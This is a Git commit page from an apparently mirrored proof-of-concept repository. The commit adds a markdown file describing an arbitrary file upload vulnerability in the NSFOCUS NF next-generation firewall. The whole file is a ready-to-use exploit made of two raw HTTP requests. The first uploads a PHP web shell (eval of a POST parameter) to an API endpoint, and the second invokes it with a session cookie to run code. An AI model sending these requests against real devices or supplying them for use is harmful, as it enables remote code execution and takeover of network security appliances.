mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 绿盟 NF 下一代防火墙 任意文件上传漏洞.md
This commit is contained in:
parent
2dddfe9de8
commit
23881f0fcb
15
绿盟 NF 下一代防火墙 任意文件上传漏洞.md
Normal file
15
绿盟 NF 下一代防火墙 任意文件上传漏洞.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
## 绿盟 NF 下一代防火墙 任意文件上传漏洞
|
||||||
|
```
|
||||||
|
POST /api/v1/device/bugsInfo HTTP/1.1
|
||||||
|
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
|
||||||
|
Host:
|
||||||
|
--4803b59d015026999b45993b1245f0ef
|
||||||
|
Content-Disposition: form-data; name="file"; filename="compose.php"
|
||||||
|
<?php eval($_POST['cmd']);?>
|
||||||
|
--4803b59d015026999b45993b1245f0ef--
|
||||||
|
POST /mail/include/header_main.php HTTP/1.1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
|
||||||
|
Host:
|
||||||
|
cmd=phpinfo();
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user